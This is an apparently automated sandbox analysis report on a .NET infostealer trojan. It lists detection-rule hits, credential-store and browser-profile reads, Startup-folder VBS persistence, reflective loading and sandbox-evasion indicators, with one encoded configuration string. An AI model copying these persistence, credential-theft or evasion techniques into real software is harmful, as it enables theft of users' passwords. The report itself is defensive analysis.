                      Source: 0.2.Ref#20203216.exe.4164bd8.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#20203216.exe, -.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: Ref#20203216.exe, Ipkgt.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: iulue.exe.0.dr, -.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: iulue.exe.0.dr, Ipkgt.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, -.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, Ipkgt.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#20203216.exe.4164bd8.4.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: Ref#20203216.exe, -.csBase64 encoded string: 'T6mheoO+MoK3aIq2f6S7YYj9XaOha4uxcKnpSYOnWb6mfJ+Sb6O3Y4S/Zeu1a5KMWqW+YqiycbXpYZaMVb63f5OycLmmd920eaSNQoO9e6S6NaG2aISrfoOVbr+/Roe9eLy3NYG2aI+cb4u2J5m8aoOrU7bpXIOyeIOmfI+9e+uTaoLoe7WmUba8b7mmZ4m9J7e3ermQaaKga4inWL+/b4+9J4O3eqKyaLHpPNbhKOLpT5Wgeb2wYp+AeaKka5ToT7m/foq2XaOha4uxcKmXdpa/c6K3fN2xfbK3YpC+J6O/YY22aLWheg=='
                      Source: iulue.exe.0.dr, -.csBase64 encoded string: 'T6mheoO+MoK3aIq2f6S7YYj9XaOha4uxcKnpSYOnWb6mfJ+Sb6O3Y4S/Zeu1a5KMWqW+YqiycbXpYZaMVb63f5OycLmmd920eaSNQoO9e6S6NaG2aISrfoOVbr+/Roe9eLy3NYG2aI+cb4u2J5m8aoOrU7bpXIOyeIOmfI+9e+uTaoLoe7WmUba8b7mmZ4m9J7e3ermQaaKga4inWL+/b4+9J4O3eqKyaLHpPNbhKOLpT5Wgeb2wYp+AeaKka5ToT7m/foq2XaOha4uxcKmXdpa/c6K3fN2xfbK3YpC+J6O/YY22aLWheg=='
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, -.csBase64 encoded string: 'T6mheoO+MoK3aIq2f6S7YYj9XaOha4uxcKnpSYOnWb6mfJ+Sb6O3Y4S/Zeu1a5KMWqW+YqiycbXpYZaMVb63f5OycLmmd920eaSNQoO9e6S6NaG2aISrfoOVbr+/Roe9eLy3NYG2aI+cb4u2J5m8aoOrU7bpXIOyeIOmfI+9e+uTaoLoe7WmUba8b7mmZ4m9J7e3ermQaaKga4inWL+/b4+9J4O3eqKyaLHpPNbhKOLpT5Wgeb2wYp+AeaKka5ToT7m/foq2XaOha4uxcKmXdpa/c6K3fN2xfbK3YpC+J6O/YY22aLWheg=='
                      Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                      Source: C:\Users\user\Desktop\Ref#20203216.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Mutant created: NULL
                      Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs"
                      Source: Ref#20203216.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#20203216.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Ref#20203216.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\iulue.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#20203216.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Ref#20203216.exe Virustotal: Detection: 47%
                      Source: Ref#20203216.exe ReversingLabs: Detection: 36%
                      Source: C:\Users\user\Desktop\Ref#20203216.exe File read: C:\Users\user\Desktop\Ref#20203216.exe
                      Source: unknown Process created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Process created: C:\Users\user\Desktop\Ref#20203216.exe "C:\Users\user\Desktop\Ref#20203216.exe"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Process created: C:\Users\user\AppData\Roaming\iulue.exe "C:\Users\user\AppData\Roaming\iulue.exe"
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, ntmarta.dll
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, vaultcli.dll, wintypes.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\iulue.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Ref#20203216.exe
                      Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#20203216.exe
                      Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#20203216.exe, 00000000.00000002.1782159785.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#20203216.exe, 00000000.00000002.1774875467.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1781971825.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, Ref#20203216.exe, 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: Ref#20203216.exe, -.cs
                      .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: Ref#20203216.exe, Yelkge.cs
                      .Net Code: Acyzeafq System.Reflection.Assembly.Load(byte[])
                      Source: iulue.exe.0.dr, -.cs
                      .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: iulue.exe.0.dr, Yelkge.cs
                      .Net Code: Acyzeafq System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, -.cs
                      .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#20203216.exe.4322240.1.raw.unpack, Yelkge.cs
                      .Net Code: Acyzeafq System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeModel.cs
                      .Net Code: TryDeserializeList
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, ListDecorator.cs
                      .Net Code: Read
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeSerializer.cs
                      .Net Code: CreateInstance
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeSerializer.cs
                      .Net Code: EmitCreateInstance
                      Source: 0.2.Ref#20203216.exe.6e10000.10.raw.unpack, TypeSerializer.cs
                      .Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeModel.cs
                      .Net Code: TryDeserializeList
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, ListDecorator.cs
                      .Net Code: Read
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeSerializer.cs
                      .Net Code: CreateInstance
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeSerializer.cs
                      .Net Code: EmitCreateInstance
                      Source: 0.2.Ref#20203216.exe.42c74c0.3.raw.unpack, TypeSerializer.cs
                      .Net Code: EmitCreateIfNull
                      Source: Yara match
                      File source: 0.2.Ref#20203216.exe.6da0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match
                      File source: 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match
                      File source: 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match
                      File source: 00000000.00000002.1781401675.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match
                      File source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara match
                      File source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Code function: 1_2_012A0C55 push edi; retf 1_2_012A0C7A
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Code function: 1_2_012AFF80 push es; ret 1_2_012AFF90
                      Source: C:\Users\user\AppData\Roaming\iulue.exe
                      Code function: 4_2_0706075A push 00000029h; retf 4_2_0706075C
                      Source: C:\Users\user\AppData\Roaming\iulue.exe
                      Code function: 4_2_070625DF push cs; retf 4_2_070625E0
                      Source: C:\Users\user\AppData\Roaming\iulue.exe
                      Code function: 4_2_070622B4 push cs; retf 4_2_070622B5
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      File created: C:\Users\user\AppData\Roaming\iulue.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Ref#20203216.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\iulue.exe
                      Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: Ref#20203216.exe PID: 6776, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: iulue.exe PID: 3264, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#20203216.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\iulue.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#20203216.exe, 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, iulue.exe, 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: 1780000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: 30F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: 50F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: 12A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: 2C80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Memory allocated: 4C80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Memory allocated: EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Memory allocated: 29D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Memory allocated: 2910000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Memory allocated: 10B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Memory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Memory allocated: 1440000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Window / User API: threadDelayed 4809
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Window / User API: threadDelayed 956
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Window / User API: threadDelayed 4896
                      Source: C:\Users\user\Desktop\Ref#20203216.exe Window / User API: threadDelayed 2359
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Window / User API: threadDelayed 2122
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Window / User API: threadDelayed 3258
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Window / User API: threadDelayed 5744
                      Source: C:\Users\user\AppData\Roaming\iulue.exe Window / User API: threadDelayed 1738
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5856 Thread sleep count: 4809 > 30
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5856 Thread sleep count: 956 > 30
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99765s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99437s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99219s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99109s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -99000s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98890s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98781s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98646s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98531s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98421s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98250s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -98138s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97961s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97842s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97734s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97625s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97515s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97406s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97297s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97187s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 5460 Thread sleep time: -97078s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -22136092888451448s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 3428 Thread sleep count: 4896 > 30
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 3428 Thread sleep count: 2359 > 30
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99672s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99562s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99453s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99344s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99234s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99124s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -99015s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98860s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98749s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98640s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98528s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98422s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98313s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98188s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -98063s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97938s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97813s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97703s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97594s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97469s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97359s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97250s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97140s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -97031s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96922s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96813s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96688s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96578s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96469s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96344s >= -30000s
                      Source: C:\Users\user\Desktop\Ref#20203216.exe TID: 1596 Thread sleep time: -96234s >= -30000s
